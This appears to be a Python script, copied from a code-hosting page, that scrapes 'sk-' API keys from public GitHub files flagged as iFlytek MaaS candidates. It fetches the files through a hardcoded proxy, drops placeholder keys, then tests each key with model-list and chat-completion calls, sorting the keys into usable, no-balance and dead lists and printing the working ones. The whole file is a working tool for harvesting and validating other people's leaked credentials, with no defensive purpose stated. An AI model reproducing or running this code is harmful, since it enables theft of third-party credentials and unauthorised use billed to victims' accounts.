201 lines
7.2 KiB
Python
201 lines
7.2 KiB
Python
#!/usr/bin/env python3
|
|
"""Harvest ALL iflytek_maas candidate keys directly from candidate files
|
|
(bypassing the broken first-harvest that context-gated them out), then run
|
|
the smart per-key /models verifier.
|
|
|
|
The original harvest uses a ±100 char context window around each key match,
|
|
which is too tight for .env files where the base URL and key sit on adjacent
|
|
lines. This script instead pulls every sk- key from files that match the
|
|
iflytek_maas provider search queries and verifies each one against
|
|
maas-api.cn-huabei-1.xf-yun.com.
|
|
"""
|
|
import json, os, re, sys, time, urllib.request, urllib.error
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from content_cache import ContentCache, parse_raw_url
|
|
from verify_cache import CachedVerifier
|
|
|
|
HERE = Path(__file__).resolve().parent
|
|
CAND = HERE / "results/all_deep/candidates.tsv"
|
|
OUT = HERE / "results/iflytek_maas_smart"
|
|
OUT.mkdir(parents=True, exist_ok=True)
|
|
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
OPENER = (urllib.request.build_opener(
|
|
urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}))
|
|
if GH_PROXY else urllib.request.build_opener())
|
|
DIRECT = urllib.request.build_opener()
|
|
UA = "Mozilla/5.0"
|
|
|
|
BASE = "https://maas-api.cn-huabei-1.xf-yun.com/v1"
|
|
SK_RE = re.compile(r"sk-[A-Za-z0-9]{32,80}")
|
|
FAKES = ("xxxx", "your-", "example", "placeholder", "changeme",
|
|
"sk-0000", "sk-test", "demo", "sample", "aaaaaaaa")
|
|
|
|
|
|
def fetch_raw_cached(repo, path, url, cc):
|
|
m = re.search(r"/blob/([0-9a-f]{40})/", url)
|
|
sha = m.group(1) if m else ""
|
|
if sha:
|
|
hit = cc.get(repo.lower(), path, sha)
|
|
if hit is not None:
|
|
return hit
|
|
txt = ""
|
|
for ref in ("HEAD", "main", "master"):
|
|
u = f"https://raw.githubusercontent.com/{repo}/{ref}/{path}"
|
|
req = urllib.request.Request(u, headers={"User-Agent": UA})
|
|
try:
|
|
with OPENER.open(req, timeout=20) as r:
|
|
txt = r.read().decode("utf-8", "replace")
|
|
break
|
|
except urllib.error.HTTPError as e:
|
|
if e.code == 404:
|
|
continue
|
|
break
|
|
except Exception:
|
|
continue
|
|
if txt and sha:
|
|
cc.put(repo.lower(), path, sha, txt)
|
|
return txt
|
|
|
|
|
|
def http(method, path, key, body=None, timeout=20):
|
|
url = BASE + path
|
|
headers = {"Authorization": f"Bearer {key}", "Accept": "application/json"}
|
|
data = None
|
|
if body is not None:
|
|
data = json.dumps(body).encode()
|
|
headers["Content-Type"] = "application/json"
|
|
req = urllib.request.Request(url, data=data, headers=headers, method=method)
|
|
try:
|
|
with DIRECT.open(req, timeout=timeout) as r:
|
|
return r.getcode(), r.read().decode("utf-8", "replace")
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
return e.code, e.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"net:{type(e).__name__}"
|
|
|
|
|
|
def verify(key):
|
|
code, body = http("GET", "/models", key)
|
|
if code == 401:
|
|
return "DEAD", f"401 {body[:140]}"
|
|
models = []
|
|
if code == 200:
|
|
try:
|
|
data = json.loads(body)
|
|
models = [m.get("id") for m in data.get("data", []) if m.get("id")]
|
|
except Exception:
|
|
pass
|
|
if not models:
|
|
models = ["xop3qwen1b7", "xop3qwen14b", "xop3qwen30b",
|
|
"xqwen257bchat", "xdeepseekv3", "xopdeepseekv32",
|
|
"xop3qwen8b", "xop3qwen235b2507",
|
|
"xopglm5", "xopkimik26", "xsparkx2flash",
|
|
"generalv3.5", "4.0Ultra"]
|
|
last = "no model tried"
|
|
for model in models[:15]:
|
|
cc, cb = http("POST", "/chat/completions", key, {
|
|
"model": model,
|
|
"messages": [{"role": "user", "content": "reply ok"}],
|
|
"max_tokens": 8, "temperature": 0.01,
|
|
})
|
|
bl = (cb or "").lower()
|
|
if cc == 200 and '"choices"' in bl:
|
|
try:
|
|
j = json.loads(cb)
|
|
content = (j["choices"][0].get("message", {}).get("content")
|
|
or "")[:50]
|
|
except Exception:
|
|
content = ""
|
|
return "USABLE", f"{model} 200 {content}"
|
|
if cc == 401:
|
|
return "DEAD", f"{model} 401 {cb[:140]}"
|
|
if cc in (402, 429):
|
|
return "NO_BALANCE", f"{model} {cc} {cb[:140]}"
|
|
if cc in (400, 403, 404):
|
|
last = f"{model} {cc}: {cb[:120]}"
|
|
continue
|
|
if cc == 0:
|
|
last = f"{model} net: {cb[:120]}"
|
|
continue
|
|
last = f"{model} {cc}: {cb[:140]}"
|
|
return "NO_ACCESS", last
|
|
|
|
|
|
def main():
|
|
# gather all iflytek_maas candidate file URLs
|
|
files = []
|
|
for ln in CAND.read_text(errors="replace").splitlines():
|
|
parts = ln.split("\t")
|
|
if len(parts) >= 4 and parts[0] == "iflytek_maas":
|
|
files.append((parts[1], parts[2], parts[3]))
|
|
print(f"iflytek_maas candidate files: {len(files)}", flush=True)
|
|
|
|
keys = {}
|
|
cc = ContentCache()
|
|
def fetch_one(item):
|
|
repo, path, url = item
|
|
try:
|
|
txt = fetch_raw_cached(repo, path, url, cc)
|
|
except Exception:
|
|
txt = ""
|
|
found = set()
|
|
for m in SK_RE.finditer(txt or ""):
|
|
k = m.group(0)
|
|
if any(f in k.lower() for f in FAKES):
|
|
continue
|
|
found.add(k)
|
|
return url, found
|
|
|
|
with ThreadPoolExecutor(max_workers=48) as ex:
|
|
done = 0
|
|
for url, found in ex.map(fetch_one, files):
|
|
done += 1
|
|
for k in found:
|
|
keys.setdefault(k, url)
|
|
if done % 100 == 0:
|
|
print(f" fetched {done}/{len(files)} keys={len(keys)}", flush=True)
|
|
cc.save()
|
|
print(f"\nextracted {len(keys)} unique sk- keys from iflytek files\n",
|
|
flush=True)
|
|
|
|
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [],
|
|
"UNKNOWN": [], "DEAD": []}
|
|
with CachedVerifier("iflytek_maas_smart", verify, force=True) as ver:
|
|
with ThreadPoolExecutor(max_workers=24) as pool:
|
|
futs = {pool.submit(ver, k): (k, s) for k, s in keys.items()}
|
|
done = 0
|
|
for fut in as_completed(futs):
|
|
k, s = futs[fut]; done += 1
|
|
try:
|
|
v, d = fut.result()
|
|
except Exception as e:
|
|
v, d = "UNKNOWN", f"exc:{e}"
|
|
buckets[v].append((k, s, d))
|
|
if done % 25 == 0:
|
|
print(f" {done}/{len(keys)} usable={len(buckets['USABLE'])} "
|
|
f"dead={len(buckets['DEAD'])} "
|
|
f"nobal={len(buckets['NO_BALANCE'])}", flush=True)
|
|
|
|
for label, rows in buckets.items():
|
|
with (OUT / f"{label.lower()}.txt").open("w") as f:
|
|
for k, s, d in rows:
|
|
f.write(f"{k}\t{s}\t{d}\n")
|
|
print("\n=== IFLYTEK MAAS FULL HARVEST RESULTS ===")
|
|
for label in buckets:
|
|
print(f" {label:11s}: {len(buckets[label])}")
|
|
for k, s, d in buckets["USABLE"]:
|
|
print(f" ✅ {k}\n {s}\n {d[:140]}")
|
|
for k, s, d in buckets["NO_BALANCE"]:
|
|
print(f" 💰 {k} (no balance) {d[:80]}")
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|